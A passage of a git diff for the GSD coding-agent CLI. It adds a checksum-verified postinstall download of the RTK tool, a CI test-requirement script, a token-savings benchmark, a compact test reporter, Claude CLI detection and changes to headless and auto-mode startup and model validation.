+    throw new Error(`download failed (${response.status}) for ${url}`)
+  }
+  if (!response.body) {
+    throw new Error(`download returned no body for ${url}`)
+  }
+  const output = createWriteStream(destination)
+  await finished(Readable.fromWeb(response.body).pipe(output))
+}
+
+function findBinaryRecursively(rootDir, binaryName) {
+  const stack = [rootDir]
+  while (stack.length > 0) {
+    const current = stack.pop()
+    if (!current) continue
+    const entries = readdirSync(current, { withFileTypes: true })
+    for (const entry of entries) {
+      const fullPath = join(current, entry.name)
+      if (entry.isFile() && entry.name === binaryName) return fullPath
+      if (entry.isDirectory()) stack.push(fullPath)
+    }
+  }
+  return null
+}
+
+function validateRtkBinary(binaryPath) {
+  const result = spawnSync(binaryPath, ['rewrite', 'git status'], {
+    encoding: 'utf-8',
+    env: RTK_ENV,
+    stdio: ['ignore', 'pipe', 'ignore'],
+    timeout: 5000,
+  })
+  return !result.error && result.status === 0 && (result.stdout || '').trim() === 'rtk git status'
+}
+
+async function ensureRtkInstalled() {
+  if (RTK_SKIP) return
+  const assetName = resolveAssetName()
+  if (!assetName) return
+  if (existsSync(managedBinaryPath) && validateRtkBinary(managedBinaryPath)) return
+
+  const tempRoot = join(managedBinDir, `.rtk-postinstall-${randomUUID().slice(0, 8)}`)
+  const archivePath = join(tempRoot, assetName)
+  const extractDir = join(tempRoot, 'extract')
+  const releaseBase = `https://github.com/${RTK_REPO}/releases/download/v${RTK_VERSION}`
+
+  mkdirSync(tempRoot, { recursive: true })
+  mkdirSync(managedBinDir, { recursive: true })
+
+  try {
+    const checksumsResponse = await fetch(`${releaseBase}/checksums.txt`, {
+      headers: { 'User-Agent': 'gsd-pi-postinstall' },
+    })
+    if (!checksumsResponse.ok) {
+      throw new Error(`failed to fetch RTK checksums (${checksumsResponse.status})`)
+    }
+
+    const checksums = parseChecksums(await checksumsResponse.text())
+    const expectedSha = checksums.get(assetName)
+    if (!expectedSha) {
+      throw new Error(`missing checksum for ${assetName}`)
+    }
+
+    await downloadToFile(`${releaseBase}/${assetName}`, archivePath)
+    const actualSha = sha256File(archivePath)
+    if (actualSha !== expectedSha) {
+      throw new Error(`checksum mismatch for ${assetName}`)
+    }
+
+    mkdirSync(extractDir, { recursive: true })
+    if (assetName.endsWith('.zip')) {
+      await extractZip(archivePath, { dir: extractDir })
+    } else {
+      const extractResult = spawnSync('tar', ['xzf', archivePath, '-C', extractDir], {
+        encoding: 'utf-8',
+        timeout: 30000,
+      })
+      if (extractResult.error || extractResult.status !== 0) {
+        throw new Error(extractResult.error?.message || extractResult.stderr?.trim() || `failed to extract ${assetName}`)
+      }
+    }
+
+    const extractedBinary = findBinaryRecursively(extractDir, platform() === 'win32' ? 'rtk.exe' : 'rtk')
+    if (!extractedBinary) {
+      throw new Error(`RTK binary not found in ${assetName}`)
+    }
+
+    copyFileSync(extractedBinary, managedBinaryPath)
+    if (platform() !== 'win32') {
+      chmodSync(managedBinaryPath, 0o755)
+    }
+
+    if (!validateRtkBinary(managedBinaryPath)) {
+      rmSync(managedBinaryPath, { force: true })
+      throw new Error('downloaded RTK binary failed validation')
+    }
+  } catch (error) {
+    logWarn(`RTK install skipped: ${error instanceof Error ? error.message : String(error)}`)
+  } finally {
+    rmSync(tempRoot, { recursive: true, force: true })
+  }
+}
+
+if (!PLAYWRIGHT_SKIP) {
   await run('npx playwright install chromium')
 }
+
+await ensureRtkInstalled()
diff --git a/scripts/require-tests.sh b/scripts/require-tests.sh
new file mode 100755
index 000000000..900be6226
--- /dev/null
+++ b/scripts/require-tests.sh
@@ -0,0 +1,67 @@
+#!/usr/bin/env bash
+# GSD-2 — Require tests with source changes
+# Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+#
+# Fails CI if a PR changes source files but includes no test file changes.
+# Exemptions: docs-only, CI/config, test-only, and chore branches.
+
+set -euo pipefail
+
+# --- resolve base ref ---
+if [ -n "${PR_BASE_SHA:-}" ]; then
+  BASE="$PR_BASE_SHA"
+elif [ -n "${PUSH_BEFORE_SHA:-}" ]; then
+  BASE="$PUSH_BEFORE_SHA"
+else
+  BASE="origin/main"
+fi
+
+FILES=$(git diff --name-only "$BASE" HEAD 2>/dev/null || git diff --name-only HEAD~1)
+
+# --- exempt branch types that don't need tests ---
+BRANCH=$(git rev-parse --abbrev-ref HEAD 2>/dev/null || echo "")
+if [[ "$BRANCH" =~ ^(docs|chore|ci)/ ]]; then
+  echo "✓ Branch type '${BRANCH%%/*}/' is exempt from test requirements"
+  exit 0
+fi
+
+# --- classify changed files ---
+# Source files: .ts/.mts/.mjs/.js in src/ or packages/, excluding tests and type declarations
+SRC_FILES=$(echo "$FILES" | grep -E '^(src|packages)/.*\.(ts|mts|mjs|js)$' \
+  | grep -vE '\.(test|spec)\.' \
+  | grep -vE '\.d\.ts$' \
+  | grep -vE '__tests__/' \
+  | grep -vE '/tests/' \
+  || true)
+
+# Test files: anything with .test. or .spec. or inside __tests__/ or tests/
+TEST_FILES=$(echo "$FILES" | grep -E '\.(test|spec)\.(ts|mts|mjs|js|cjs)$' || true)
+
+# --- no source changes? nothing to enforce ---
+if [ -z "$SRC_FILES" ]; then
+  echo "✓ No source file changes detected — test requirement does not apply"
+  exit 0
+fi
+
+# --- source changes exist — require test changes ---
+SRC_COUNT=$(echo "$SRC_FILES" | wc -l | tr -d ' ')
+
+if [ -z "$TEST_FILES" ]; then
+  echo "──────────────────────────────────────────────────────"
+  echo "✗ FAILED: Source files changed but no tests included"
+  echo "──────────────────────────────────────────────────────"
+  echo ""
+  echo "Changed source files ($SRC_COUNT):"
+  echo "$SRC_FILES" | sed 's/^/  /'
+  echo ""
+  echo "Per CONTRIBUTING.md:"
+  echo "  • Bug fixes must include a regression test"
+  echo "  • Features must include tests covering primary success + one failure path"
+  echo "  • Behavior changes must update existing tests"
+  echo ""
+  echo "Add or update test files (*.test.ts) to proceed."
+  exit 1
+fi
+
+TEST_COUNT=$(echo "$TEST_FILES" | wc -l | tr -d ' ')
+echo "✓ Test requirement satisfied: $SRC_COUNT source file(s), $TEST_COUNT test file(s) changed"
diff --git a/scripts/rtk-benchmark.mjs b/scripts/rtk-benchmark.mjs
new file mode 100644
index 000000000..ef6480b85
--- /dev/null
+++ b/scripts/rtk-benchmark.mjs
@@ -0,0 +1,169 @@
+#!/usr/bin/env node
+
+import { spawnSync } from 'node:child_process'
+import { homedir, tmpdir } from 'node:os'
+import { join, dirname } from 'node:path'
+import { mkdirSync, mkdtempSync, rmSync, writeFileSync } from 'node:fs'
+
+function getManagedRtkPath() {
+  return join(homedir(), '.gsd', 'agent', 'bin', process.platform === 'win32' ? 'rtk.exe' : 'rtk')
+}
+
+function run(command, args, options = {}) {
+  const result = spawnSync(command, args, {
+    encoding: 'utf-8',
+    stdio: ['ignore', 'pipe', 'pipe'],
+    ...options,
+  })
+  if (result.error) throw result.error
+  return result
+}
+
+function ensureOk(result, label) {
+  if (result.status !== 0) {
+    throw new Error(`${label} failed: ${result.stderr || result.stdout || `exit ${result.status}`}`)
+  }
+}
+
+function createFixture(projectDir) {
+  mkdirSync(join(projectDir, 'src', 'components'), { recursive: true })
+
+  writeFileSync(join(projectDir, 'package.json'), JSON.stringify({
+    name: 'gsd-rtk-benchmark',
+    version: '1.0.0',
+    scripts: {
+      test: 'node test.js',
+    },
+  }, null, 2))
+
+  const testLines = []
+  for (let i = 0; i < 120; i += 1) {
+    const group = i % 6
+    testLines.push(`console.log('FAIL src/components/file${group}.test.ts:${i + 1}: expected value ${i}')`)
+  }
+  testLines.push('process.exit(1)')
+  writeFileSync(join(projectDir, 'test.js'), `${testLines.join('\n')}\n`)
+
+  for (let i = 1; i <= 80; i += 1) {
+    writeFileSync(
+      join(projectDir, 'src', 'components', `file${i}.ts`),
+      `export function component_${i}() {\n  return "value_${i}";\n}\n`,
+    )
+  }
+
+  ensureOk(run('git', ['init', '-q'], { cwd: projectDir }), 'git init')
+  ensureOk(run('git', ['config', 'user.email', 'benchmark@example.com'], { cwd: projectDir }), 'git config email')
+  ensureOk(run('git', ['config', 'user.name', 'Benchmark'], { cwd: projectDir }), 'git config name')
+  ensureOk(run('git', ['add', '.'], { cwd: projectDir }), 'git add')
+  ensureOk(run('git', ['commit', '-qm', 'init'], { cwd: projectDir }), 'git commit')
+
+  for (let i = 1; i <= 25; i += 1) {
+    writeFileSync(
+      join(projectDir, 'src', 'components', `file${i}.ts`),
+      `export function component_${i}() {\n  return "value_${i}";\n}\n// change ${i}\n`,
+    )
+  }
+
+  for (let i = 81; i <= 100; i += 1) {
+    writeFileSync(
+      join(projectDir, 'src', 'components', `file${i}.ts`),
+      `export const new_${i} = ${i}\n`,
+    )
+  }
+}
+
+function renderMarkdown({ summary, history, binaryPath }) {
+  const timestamp = new Date().toISOString()
+  return [
+    '# RTK benchmark evidence',
+    '',
+    `- Generated: ${timestamp}`,
+    `- RTK binary: \`${binaryPath}\``,
+    `- Telemetry: disabled via \`RTK_TELEMETRY_DISABLED=1\``,
+    `- Fixture: synthetic git + find + ls + npm test workload`,
+    '',
+    '## Aggregate savings',
+    '',
+    '| Commands | Input tokens | Output tokens | Saved tokens | Savings | Avg command time |',
+    '| --- | ---: | ---: | ---: | ---: | ---: |',
+    `| ${summary.total_commands} | ${summary.total_input} | ${summary.total_output} | ${summary.total_saved} | ${summary.avg_savings_pct.toFixed(1)}% | ${summary.avg_time_ms} ms |`,
+    '',
+    '## Command breakdown',
+    '',
+    '```text',
+    history.trim(),
+    '```',
+    '',
+    '## Commands exercised',
+    '',
+    '- `git status`',
+    '- `git diff`',
+    '- `find src -type f`',
+    '- `ls -R src`',
+    '- `npm run test`',
+    '',
+  ].join('\n')
+}
+
+function main() {
+  const outputIndex = process.argv.indexOf('--output')
+  const outputPath = outputIndex !== -1 ? process.argv[outputIndex + 1] : null
+  const binaryPath = process.env.GSD_RTK_PATH || getManagedRtkPath()
+
+  if (!binaryPath) {
+    throw new Error('RTK binary path not resolved')
+  }
+
+  const workspace = mkdtempSync(join(tmpdir(), 'gsd-rtk-benchmark-'))
+  const homeDir = join(workspace, 'home')
+  const projectDir = join(workspace, 'project')
+  mkdirSync(homeDir, { recursive: true })
+  mkdirSync(projectDir, { recursive: true })
+
+  try {
+    createFixture(projectDir)
+
+    const env = {
+      ...process.env,
+      HOME: homeDir,
+      RTK_TELEMETRY_DISABLED: '1',
+    }
+
+    const commands = [
+      ['git', 'status'],
+      ['git', 'diff'],
+      ['find', 'src', '-type', 'f'],
+      ['ls', '-R', 'src'],
+      ['npm', 'run', 'test'],
+    ]
+
+    for (const command of commands) {
+      run(binaryPath, command, { cwd: projectDir, env })
+    }
+
+    const summaryJson = run(binaryPath, ['gain', '--all', '--format', 'json'], { cwd: projectDir, env })
+    ensureOk(summaryJson, 'rtk gain --all --format json')
+    const historyText = run(binaryPath, ['gain', '--history'], { cwd: projectDir, env })
+    ensureOk(historyText, 'rtk gain --history')
+
+    const parsed = JSON.parse(summaryJson.stdout)
+    const markdown = renderMarkdown({
+      summary: parsed.summary,
+      history: historyText.stdout,
+      binaryPath,
+    })
+
+    if (outputPath) {
+      mkdirSync(dirname(outputPath), { recursive: true })
+      writeFileSync(outputPath, markdown, 'utf-8')
+      console.log(outputPath)
+      return
+    }
+
+    console.log(markdown)
+  } finally {
+    rmSync(workspace, { recursive: true, force: true })
+  }
+}
+
+main()
diff --git a/scripts/test-reporter-compact.mjs b/scripts/test-reporter-compact.mjs
new file mode 100644
index 000000000..ec87b221d
--- /dev/null
+++ b/scripts/test-reporter-compact.mjs
@@ -0,0 +1,44 @@
+/**
+ * Compact test reporter: silent on pass, prints failures + final summary.
+ * Usage: --test-reporter=./scripts/test-reporter-compact.mjs
+ */
+import { Transform } from 'node:stream';
+
+export default class CompactReporter extends Transform {
+  #pass = 0;
+  #fail = 0;
+  #skip = 0;
+  #failures = [];
+
+  constructor() {
+    super({ objectMode: true });
+  }
+
+  _transform(event, _enc, cb) {
+    switch (event.type) {
+      case 'test:pass':
+        if (!event.data.skip) this.#pass++;
+        else this.#skip++;
+        break;
+      case 'test:fail': {
+        this.#fail++;
+        const { name, details } = event.data;
+        const err = details?.error;
+        const msg = err?.message ?? String(err ?? 'unknown');
+        const loc = err?.cause?.stack?.split('\n')[1]?.trim() ?? '';
+        this.#failures.push(`  ✖ ${name}\n    ${msg}${loc ? `\n    ${loc}` : ''}`);
+        break;
+      }
+    }
+    cb();
+  }
+
+  _flush(cb) {
+    if (this.#failures.length) {
+      this.push(`\n✖ failing tests:\n${this.#failures.join('\n\n')}\n`);
+    }
+    const status = this.#fail === 0 ? '✔' : '✖';
+    this.push(`\n${status} ${this.#pass} passed, ${this.#fail} failed, ${this.#skip} skipped\n`);
+    cb();
+  }
+}
diff --git a/scripts/watch-resources.js b/scripts/watch-resources.js
index 900afae51..d0a160e26 100644
--- a/scripts/watch-resources.js
+++ b/scripts/watch-resources.js
@@ -37,6 +37,9 @@ process.stderr.write(`[watch-resources] Initial sync done\n`)
 // On Linux (Node <20.13) it throws ERR_FEATURE_UNAVAILABLE_ON_PLATFORM.
 // Fall back to polling on unsupported platforms.
 let timer = null
+let fsWatcher = null
+let pollInterval = null
+
 const onChange = () => {
   if (timer) clearTimeout(timer)
   timer = setTimeout(() => {
@@ -46,13 +49,19 @@ const onChange = () => {
 }
 
 try {
-  watch(src, { recursive: true }, onChange)
+  fsWatcher = watch(src, { recursive: true }, onChange)
 } catch {
   // Fallback: poll every 2s (Linux without recursive watch support)
   process.stderr.write(`[watch-resources] fs.watch recursive not supported, falling back to polling\n`)
-  setInterval(() => {
+  pollInterval = setInterval(() => {
     try { sync() } catch {}
   }, 2000)
 }
 
+process.on('exit', () => {
+  if (timer) clearTimeout(timer)
+  if (fsWatcher) fsWatcher.close()
+  if (pollInterval) clearInterval(pollInterval)
+})
+
 process.stderr.write(`[watch-resources] Watching src/resources/ → dist/resources/\n`)
diff --git a/src/claude-cli-check.ts b/src/claude-cli-check.ts
new file mode 100644
index 000000000..69a70037a
--- /dev/null
+++ b/src/claude-cli-check.ts
@@ -0,0 +1,37 @@
+// GSD2 — Claude CLI binary detection for onboarding
+// Lightweight check used at onboarding time (before extensions load).
+// The full readiness check with caching lives in the claude-code-cli extension.
+
+import { execFileSync } from 'node:child_process'
+
+/**
+ * Check if the `claude` binary is installed (regardless of auth state).
+ */
+export function isClaudeBinaryInstalled(): boolean {
+  try {
+    execFileSync('claude', ['--version'], { timeout: 5_000, stdio: 'pipe' })
+    return true
+  } catch {
+    return false
+  }
+}
+
+/**
+ * Check if the `claude` CLI is installed AND authenticated.
+ */
+export function isClaudeCliReady(): boolean {
+  try {
+    execFileSync('claude', ['--version'], { timeout: 5_000, stdio: 'pipe' })
+  } catch {
+    return false
+  }
+
+  try {
+    const output = execFileSync('claude', ['auth', 'status'], { timeout: 5_000, stdio: 'pipe' })
+      .toString()
+      .toLowerCase()
+    return !(/not logged in|no credentials|unauthenticated|not authenticated/i.test(output))
+  } catch {
+    return false
+  }
+}
diff --git a/src/cli.ts b/src/cli.ts
index 91c51dec8..5009f23b7 100644
--- a/src/cli.ts
+++ b/src/cli.ts
@@ -2,6 +2,7 @@ import {
   AuthStorage,
   DefaultResourceLoader,
   ModelRegistry,
+  runPackageCommand,
   SettingsManager,
   SessionManager,
   createAgentSession,
@@ -15,11 +16,13 @@ import { agentDir, sessionsDir, authFilePath } from './app-paths.js'
 import { initResources, buildResourceLoader, getNewerManagedResourceVersion } from './resource-loader.js'
 import { ensureManagedTools } from './tool-bootstrap.js'
 import { loadStoredEnvKeys } from './wizard.js'
-import { getPiDefaultModelAndProvider, migratePiCredentials } from './pi-migration.js'
+import { migratePiCredentials } from './pi-migration.js'
+import { validateConfiguredModel } from './startup-model-validation.js'
 import { shouldRunOnboarding, runOnboarding } from './onboarding.js'
 import chalk from 'chalk'
 import { checkForUpdates } from './update-check.js'
 import { printHelp, printSubcommandHelp } from './help-text.js'
+import { applySecurityOverrides } from './security-overrides.js'
 import {
   parseCliArgs as parseWebCliArgs,
   runWebCliBranch,
@@ -28,6 +31,17 @@ import {
 import { stopWebMode } from './web-mode.js'
 import { getProjectSessionsDir } from './project-sessions.js'
 import { markStartup, printStartupTimings } from './startup-timings.js'
+import { bootstrapRtk, GSD_RTK_DISABLED_ENV } from './rtk.js'
+import { loadEffectiveGSDPreferences } from './resources/extensions/gsd/preferences.js'
+
+// ---------------------------------------------------------------------------
+// V8 compile cache — Node 22+ can cache compiled bytecode across runs,
+// eliminating repeated parse/compile overhead for unchanged modules.
+// Must be set early so dynamic imports (extensions, lazy subcommands) benefit.
+// ---------------------------------------------------------------------------
+if (parseInt(process.versions.node) >= 22) {
+  process.env.NODE_COMPILE_CACHE ??= join(agentDir, '.compile-cache')
+}
 
 // ---------------------------------------------------------------------------
 // Minimal CLI arg parser — detects print/subagent mode flags
@@ -121,6 +135,35 @@ const isPrintMode = cliFlags.print || cliFlags.mode !== undefined
 
 // Early resource-skew check — must run before TTY gate so version mismatch
 // errors surface even in non-TTY environments.
+async function ensureRtkBootstrap(): Promise<void> {
+  if ((ensureRtkBootstrap as { _done?: boolean })._done) return
+
+  // RTK is opt-in via experimental.rtk preference. Default: disabled.
+  // Honor GSD_RTK_DISABLED if already explicitly set in the environment
+  // (env var takes precedence over preferences for manual override).
+  if (!process.env[GSD_RTK_DISABLED_ENV]) {
+    const prefs = loadEffectiveGSDPreferences();
+    const rtkEnabled = prefs?.preferences.experimental?.rtk === true;
+    if (!rtkEnabled) {
+      process.env[GSD_RTK_DISABLED_ENV] = "1";
+    }
+  }
+
+  const rtkStatus = await bootstrapRtk()
+  ;(ensureRtkBootstrap as { _done?: boolean })._done = true
+  markStartup('bootstrapRtk')
+  if (!rtkStatus.available && rtkStatus.supported && rtkStatus.enabled && rtkStatus.reason) {
+    process.stderr.write(`[gsd] Warning: RTK unavailable — continuing without shell-command compression (${rtkStatus.reason}).\n`)
+  }
+}
+
+// `gsd update` — update to the latest version via npm
+if (cliFlags.messages[0] === 'update') {
+  const { runUpdate } = await import('./update-cmd.js')
+  await runUpdate()
+  process.exit(0)
+}
+
 exitIfManagedResourcesAreNewer(agentDir)
 
 // Early TTY check — must come before heavy initialization to avoid dangling
@@ -129,6 +172,7 @@ const hasSubcommand = cliFlags.messages.length > 0
 if (!process.stdin.isTTY && !isPrintMode && !hasSubcommand && !cliFlags.listModels && !cliFlags.web) {
   process.stderr.write('[gsd] Error: Interactive mode requires a terminal (TTY).\n')
   process.stderr.write('[gsd] Non-interactive alternatives:\n')
+  process.stderr.write('[gsd]   gsd auto                       Auto-mode (pipeable, no TUI)\n')
   process.stderr.write('[gsd]   gsd --print "your message"     Single-shot prompt\n')
   process.stderr.write('[gsd]   gsd --mode rpc                 JSON-RPC over stdin/stdout\n')
   process.stderr.write('[gsd]   gsd --mode mcp                 MCP server over stdin/stdout\n')
@@ -144,6 +188,19 @@ if (subcommand && process.argv.includes('--help')) {
   }
 }
 
+const packageCommand = await runPackageCommand({
+  appName: 'gsd',
+  args: process.argv.slice(2),
+  cwd: process.cwd(),
+  agentDir,
+  stdout: process.stdout,
+  stderr: process.stderr,
+  allowedCommands: new Set(['install', 'remove', 'list']),
+})
+if (packageCommand.handled) {
+  process.exit(packageCommand.exitCode)
+}
+
 // `gsd config` — replay the setup wizard and exit
 if (cliFlags.messages[0] === 'config') {
   const authStorage = AuthStorage.create(authFilePath)
@@ -152,13 +209,6 @@ if (cliFlags.messages[0] === 'config') {
   process.exit(0)
 }
 
-// `gsd update` — update to the latest version via npm
-if (cliFlags.messages[0] === 'update') {
-  const { runUpdate } = await import('./update-cmd.js')
-  await runUpdate()
-  process.exit(0)
-}
-
 // `gsd web stop [path|all]` — stop web server before anything else
 if (cliFlags.messages[0] === 'web' && cliFlags.messages[1] === 'stop') {
   const webFlags = parseWebCliArgs(process.argv)
@@ -175,6 +225,7 @@ if (cliFlags.messages[0] === 'web' && cliFlags.messages[1] === 'stop') {
 
 // `gsd --web [path]` or `gsd web [start] [path]` — launch browser-only web mode
 if (cliFlags.web || (cliFlags.messages[0] === 'web' && cliFlags.messages[1] !== 'stop')) {
+  await ensureRtkBootstrap()
   const webFlags = parseWebCliArgs(process.argv)
   const webBranch = await runWebCliBranch(webFlags, {
     stderr: process.stderr,
@@ -246,11 +297,33 @@ if (cliFlags.messages[0] === 'sessions') {
 
 // `gsd headless` — run auto-mode without TUI
 if (cliFlags.messages[0] === 'headless') {
+  await ensureRtkBootstrap()
+  // Sync bundled resources before headless runs (#3471). Without this,
+  // headless-query loads from src/resources/ while auto/interactive load
+  // from ~/.gsd/agent/extensions/ — different extension copies diverge.
+  initResources(agentDir)
   const { runHeadless, parseHeadlessArgs } = await import('./headless.js')
   await runHeadless(parseHeadlessArgs(process.argv))
   process.exit(0)
 }
 
+// `gsd auto [args...]` — shorthand for `gsd headless auto [args...]` (#2732)
+// Without this, `gsd auto` falls through to the interactive TUI which hangs
+// when stdin/stdout are piped (non-TTY environments).
+if (cliFlags.messages[0] === 'auto') {
+  await ensureRtkBootstrap()
+  const { runHeadless, parseHeadlessArgs } = await import('./headless.js')
+  // Rewrite argv so parseHeadlessArgs sees: [node, gsd, headless, auto, ...rest]
+  const rewrittenArgv = [
+    process.argv[0],
+    process.argv[1],
+    'headless',
+    ...cliFlags.messages,   // ['auto', ...extra args]
+  ]
+  await runHeadless(parseHeadlessArgs(rewrittenArgv))
+  process.exit(0)
+}
+
 // Pi's tool bootstrap can mis-detect already-installed fd/rg on some systems
 // because spawnSync(..., ["--version"]) returns EPERM despite a zero exit code.
 // Provision local managed binaries first so Pi sees them without probing PATH.
@@ -269,6 +342,7 @@ const modelsJsonPath = resolveModelsJsonPath()
 const modelRegistry = new ModelRegistry(authStorage, modelsJsonPath)
 markStartup('ModelRegistry')
 const settingsManager = SettingsManager.create(agentDir)
+applySecurityOverrides(settingsManager)
 markStartup('SettingsManager.create')
 
 // Run onboarding wizard on first launch (no LLM provider configured)
@@ -342,42 +416,6 @@ if (cliFlags.listModels !== undefined) {
   process.exit(0)
 }
 
-// Validate configured model on startup — catches stale settings from prior installs
-// (e.g. grok-2 which no longer exists) and fresh installs with no settings.
-// Only resets the default when the configured model no longer exists in the registry;
-// never overwrites a valid user choice.
-const configuredProvider = settingsManager.getDefaultProvider()
-const configuredModel = settingsManager.getDefaultModel()
-const allModels = modelRegistry.getAll()
-const availableModels = modelRegistry.getAvailable()
-const configuredExists = configuredProvider && configuredModel &&
-  allModels.some((m) => m.provider === configuredProvider && m.id === configuredModel)
-const configuredAvailable = configuredProvider && configuredModel &&
-  availableModels.some((m) => m.provider === configuredProvider && m.id === configuredModel)
-
-if (!configuredModel || !configuredExists) {
-  // Model not configured at all, or removed from registry — pick a fallback.
-  // Only fires when the model is genuinely unknown (not just temporarily unavailable).
-  const piDefault = getPiDefaultModelAndProvider()
-  const preferred =
-    (piDefault
-      ? availableModels.find((m) => m.provider === piDefault.provider && m.id === piDefault.model)
-      : undefined) ||
-    availableModels.find((m) => m.provider === 'openai' && m.id === 'gpt-5.4') ||
-    availableModels.find((m) => m.provider === 'openai') ||
-    availableModels.find((m) => m.provider === 'anthropic' && m.id === 'claude-opus-4-6') ||
-    availableModels.find((m) => m.provider === 'anthropic' && m.id.includes('opus')) ||
-    availableModels.find((m) => m.provider === 'anthropic') ||
-    availableModels[0]
-  if (preferred) {
-    settingsManager.setDefaultModelAndProvider(preferred.provider, preferred.id)
-  }
-}
-
-if (settingsManager.getDefaultThinkingLevel() !== 'off' && !configuredExists) {
-  settingsManager.setDefaultThinkingLevel('off')
-}
-
 // GSD always uses quiet startup — the gsd extension renders its own branded header
 if (!settingsManager.getQuietStartup()) {
   settingsManager.setQuietStartup(true)
@@ -392,6 +430,7 @@ if (!settingsManager.getCollapseChangelog()) {
 // Print / subagent mode — single-shot execution, no TTY required
 // ---------------------------------------------------------------------------
 if (isPrintMode) {
+  await ensureRtkBootstrap()
   const sessionManager = cliFlags.noSession
     ? SessionManager.inMemory()
     : SessionManager.create(process.cwd())
@@ -418,20 +457,64 @@ if (isPrintMode) {
   await resourceLoader.reload()
   markStartup('resourceLoader.reload')
 
-  const { session, extensionsResult } = await createAgentSession({
+  const { session, extensionsResult, modelFallbackMessage } = await createAgentSession({
     authStorage,
     modelRegistry,
     settingsManager,
     sessionManager,
     resourceLoader,
+    isClaudeCodeReady: () => modelRegistry.isProviderRequestReady('claude-code'),
   })
   markStartup('createAgentSession')
 
+  // Migrate anthropic OAuth users to claude-code provider when CLI is available (#3772).
+  // Anthropic blocks third-party apps from using subscription quotas — routing through
+  // the local claude CLI binary is TOS-compliant.
+  if (modelRegistry.isProviderRequestReady('claude-code') && settingsManager.getDefaultProvider() === 'anthropic') {
+    const currentModelId = settingsManager.getDefaultModel()
+    if (currentModelId) {
+      const ccModel = modelRegistry.find('claude-code', currentModelId)
+      if (ccModel) {
+        try {
+          await session.setModel(ccModel)
+          // Only persist after successful session switch to avoid desync
+          settingsManager.setDefaultModelAndProvider('claude-code', currentModelId)
+        } catch {
+          // claude-code provider not ready — leave both session and settings unchanged
+        }
+      }
+    }
+  }
+
+  // Validate configured model AFTER extensions have registered their models (#2626).
+  // Before this, extension-provided models (e.g. claude-code/*) were not yet in the
+  // registry, causing the user's valid choice to be silently overwritten.
+  validateConfiguredModel(modelRegistry, settingsManager)
+
+  // Re-apply the validated model to the session only when findInitialModel() used a
+  // fallback (not when restoring an existing session's model). This prevents silently
+  // overriding the persisted model of resumed conversations (#3534).
+  if (modelFallbackMessage) {
+    const validatedProvider = settingsManager.getDefaultProvider()
+    const validatedModelId = settingsManager.getDefaultModel()
+    if (validatedProvider && validatedModelId) {
+      const correctModel = modelRegistry.getAvailable()
+        .find((m) => m.provider === validatedProvider && m.id === validatedModelId)
+      if (correctModel) {
+        try {
+          await session.setModel(correctModel)
+        } catch {
+          // Provider not ready — leave session on its current model
+        }
+      }
+    }
+  }
+
   if (extensionsResult.errors.length > 0) {
     for (const err of extensionsResult.errors) {
       // Downgrade conflicts with built-in tools to warnings (#1347)
-      const isSuperseded = err.error.includes("supersedes");
-      const prefix = isSuperseded ? "Extension conflict" : "Extension load error";
+      const isConflict = err.error.includes("supersedes") || err.error.includes("conflicts with");
+      const prefix = isConflict ? "Extension conflict" : "Extension load error";
       process.stderr.write(`[gsd] ${prefix}: ${err.error}\n`)
     }
   }
@@ -515,10 +598,26 @@ if (!cliFlags.worktree && !isPrintMode) {
   } catch { /* non-fatal */ }
 }
 
+// ---------------------------------------------------------------------------
+// Auto-redirect: `gsd auto` with piped stdout → headless mode (#2732)
+// When stdout is not a TTY (e.g. `gsd auto | cat`, `gsd auto > file`),
+// the TUI cannot render and the process hangs. Redirect to headless mode
+// which handles non-interactive output gracefully.
+// ---------------------------------------------------------------------------
+if (cliFlags.messages[0] === 'auto' && !process.stdout.isTTY) {
+  await ensureRtkBootstrap()
+  const { runHeadless, parseHeadlessArgs } = await import('./headless.js')
+  process.stderr.write('[gsd] stdout is not a terminal — running auto-mode in headless mode.\n')
+  await runHeadless(parseHeadlessArgs(['node', 'gsd', 'headless', ...cliFlags.messages.slice(1)]))
+  process.exit(0)
+}
+
 // ---------------------------------------------------------------------------
 // Interactive mode — normal TTY session
 // ---------------------------------------------------------------------------
 
+await ensureRtkBootstrap()
+
 // Per-directory session storage — same encoding as the upstream SDK so that
 // /resume only shows sessions from the current working directory.
 const cwd = process.cwd()
@@ -538,23 +637,75 @@ const sessionManager = cliFlags._selectedSessionPath
 exitIfManagedResourcesAreNewer(agentDir)
 initResources(agentDir)
 markStartup('initResources')
+
+// Overlap resource loading with session manager setup — both are independent.
+// resourceLoader.reload() is the most expensive step (jiti compilation), so
+// starting it early shaves ~50-200ms off interactive startup.
 const resourceLoader = buildResourceLoader(agentDir)
-await resourceLoader.reload()
+const resourceLoadPromise = resourceLoader.reload()
+
+// While resources load, let session manager finish any async I/O it needs.
+// Then await the resource promise before creating the agent session.
+await resourceLoadPromise
 markStartup('resourceLoader.reload')
 
-const { session, extensionsResult } = await createAgentSession({
+const { session, extensionsResult, modelFallbackMessage: interactiveFallbackMsg } = await createAgentSession({
   authStorage,
   modelRegistry,
   settingsManager,
   sessionManager,
   resourceLoader,
+  isClaudeCodeReady: () => modelRegistry.isProviderRequestReady('claude-code'),
 })
 markStartup('createAgentSession')
 
+// Migrate anthropic OAuth users to claude-code provider when CLI is available (#3772).
+// Anthropic blocks third-party apps from using subscription quotas — routing through
+// the local claude CLI binary is TOS-compliant.
+if (modelRegistry.isProviderRequestReady('claude-code') && settingsManager.getDefaultProvider() === 'anthropic') {
+  const currentModelId = settingsManager.getDefaultModel()
+  if (currentModelId) {
+    const ccModel = modelRegistry.find('claude-code', currentModelId)
+    if (ccModel) {
+      try {
+        await session.setModel(ccModel)
+        // Only persist after successful session switch to avoid desync
+        settingsManager.setDefaultModelAndProvider('claude-code', currentModelId)
+      } catch {
+        // claude-code provider not ready — leave both session and settings unchanged
+      }
+    }
+  }
+}
+
+// Validate configured model AFTER extensions have registered their models (#2626).
+// Before this, extension-provided models (e.g. claude-code/*) were not yet in the
+// registry, causing the user's valid choice to be silently overwritten.
+validateConfiguredModel(modelRegistry, settingsManager)
+
+// Re-apply the validated model to the session only when findInitialModel() used a
+// fallback (not when restoring an existing session's model). This prevents silently
+// overriding the persisted model of resumed conversations (#3534).
+if (interactiveFallbackMsg) {
+  const validatedProvider = settingsManager.getDefaultProvider()
+  const validatedModelId = settingsManager.getDefaultModel()
+  if (validatedProvider && validatedModelId) {
+    const correctModel = modelRegistry.getAvailable()
+      .find((m) => m.provider === validatedProvider && m.id === validatedModelId)
+    if (correctModel) {
+      try {
+        await session.setModel(correctModel)
+      } catch {
+        // Provider not ready — leave session on its current model
+      }
+    }
+  }
